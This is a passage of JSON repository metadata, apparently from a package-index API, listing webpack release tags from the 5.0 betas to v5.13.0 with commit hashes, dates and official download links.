.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https: